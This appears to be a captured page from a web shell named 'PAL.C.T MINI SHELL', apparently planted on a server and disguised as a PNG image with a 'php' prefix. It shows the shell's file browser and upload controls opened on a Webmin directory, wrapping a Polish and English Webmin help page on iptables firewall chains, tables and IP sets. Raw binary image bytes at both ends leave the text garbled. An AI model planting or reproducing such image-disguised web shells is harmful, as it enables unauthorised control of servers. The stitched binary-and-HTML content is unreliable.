php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/libexec/webmin/firewall6/help/
upload
files >> //usr/libexec/webmin/firewall6/help/intro.pl.html

<header>Firewall Linuksa</header>

<h3>Wprowadzenie do modułu</h3>

Ten moduł pozwala na konfigurację funkcji firewalla IPtables znajdujących
się w kernelach Linuksa 2.4. W odróżnieniu od innych programów konfiguracji
firewalla ten moduł nie tworzy skryptów shell, a zamiast tego odczytuje
i edytuje pliki w formacie umożliwiającym ich odczyt w <tt>ipi(6)tables-restore</tt>
i <tt>ipi(6)tables-save</tt>. <p>

Jeżeli masz już w systemie firewall skonfigurowany ręcznie lub przez plik
skryptu, to ten moduł przekonwertuje go do odpowiedniego formatu IPtables
i utworzy skrypt do uruchamiania reguł przy starcie. Po tej operacji nie
powinno się dłużej używać starych skryptów do edycji reguł, należy je
także wyłączyć z autostartu. <p>

<h3>Opis IPtables</h3>

Każdy pakiet sieciowy przesyłany do lub z twojego systemu jest sprawdzany z
przynajmniej jednym łańcuchem, który określa co powinno się z nim stać.
Każdy łańcuch zawiera zero lub więcej reguł, każdy z nich posiada warunek
(określa, które pakiety do niego pasują) i akcję (do kontroli co się stanie
z pasującym pakietem). Każdy łańcuch dodatkowo posiada akcję domyślną, która
określa co się stanie z pakietami, które nie pasują do żadnej reguły. <p>

Każdy łańcuch jest częścią tabeli, aktualnie dostępne są trzy :
<ul>
<li><b>Filtracja pakietu (<tt>filter</tt>)</b><br>
    Łańcuchy w tej tabeli mogą być wykorzystane do kontroli danych pochodzących
	do twojego systemu z innych hostów w sieci, danych wysyłanych ze twojego
	systemu przez użytkowników i procesy oraz dane przekazane przez twój system,
	jeśli działa jako router. <p>
<li><b>Translacja adresów sieciowych (<tt>nat</tt>)</b><br>
    Tabela ta może być używana do konfigurowania NAT lub maskowania, co jest
	przydatne, jeśli chcesz dać całej sieci komputerów dostęp do Internetu za
	pośrednictwem tylko jednego prawdziwego adresu IP. <p>
<li><b>Przeróbka pakietów (<tt>mangle</tt>)</b><br>
    Ta tabela dotyczy modyfikowania pakietów przekazywanych przez lub wysyłanych
	z systemu.<p>
</ul>

Oprócz standardowych łańcuchów, które są częścią każdej tabeli, można również
tworzyć własne łańcuchy, które mogą być uruchamiane przez reguły w łańcuchach
wbudowanych. Może to być przydatne do grupowania i udostępniania zasad, które
mogą być wykorzystane w wielu miejscach. <p>

<h3>Główna strona modułu</h3>

Strona główna tego modułu zawiera wszystkie łańcuchy i reguły z jednej z dostępnych
tabel, wybranej z listy w lewym górnym rogu. Poniżej znajduje się sekcja każdego
łańcucha w bieżącej tabeli, ze wszystkimi regułami w każdym wybranym łańcuchu i
ich opisane warunki. Dla każdego łańcucha, można zmienić domyślną akcję,
korzystając z listy rozwijanej, jeśli łańcuch jest jednym z tych, wbudowanych do
tabeli, lub usunąć go za pomocą przycisku Usuń, jeżeli łańcuch jest zdefiniowany
przez użytkownika. <p>

W celu edycji dowolnej reguły w łańcuchu, kliknij na nią. Kliknij na strzałki
po prawej stronie, aby przenieść w górę lub w dół lub kliknij na przycisk
Dodaj regułę, aby dodać nową. Dodawanie lub edytowanie reguł przekieruje cię
do strony, na której możesz wybrać akcję do każdej reguły i warunki, w celu
określenia kiedy ta akcja ma być wykonana. <p>

Na dole strony znajdują się przyciski umożliwiające aktywację aktualnej
konfiguracji firewalla przez załadowanie do kernela polecenia
<tt>ipi(6)tables-restore</tt>. Poniżej jest przycisk, który działa odwrotnie
tzn. pobiera aktywną konfigurację firewalla z kernela i umożliwia jej
edycję w tym module. Na końcu, jeżeli twoja dystrybucja obsługuje tę
funkcję znajduje się przycisk umożliwiający wybranie, czy firewall
ma być aktywowany w momencie uruchamiania systemu czy nie. <p>


<h3>Filtering chains</h3>

For better collaboration with external iptables scripts you can exclude individual
chains from the processing by the firewall. To do this, you must select direct
processing of rules in the settings and enter a filter list, which excludes
the appropriate chains from processing.
Chains that are not exculded from editing are flagged with a "not managed by firewall" message.
<p>

<h3>IP Sets</h3>

Newer versions of ip(6)table support the ipset extension.
IP sets are lists of IP addresses in the main memory, which can be searched very efficiently
and used as a condition in rules. On the main page, existing IP sets that can be used by 
rules are displayed. Currently, however, it is not possible to manage these in the firewall.
<p>

<hr>

y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`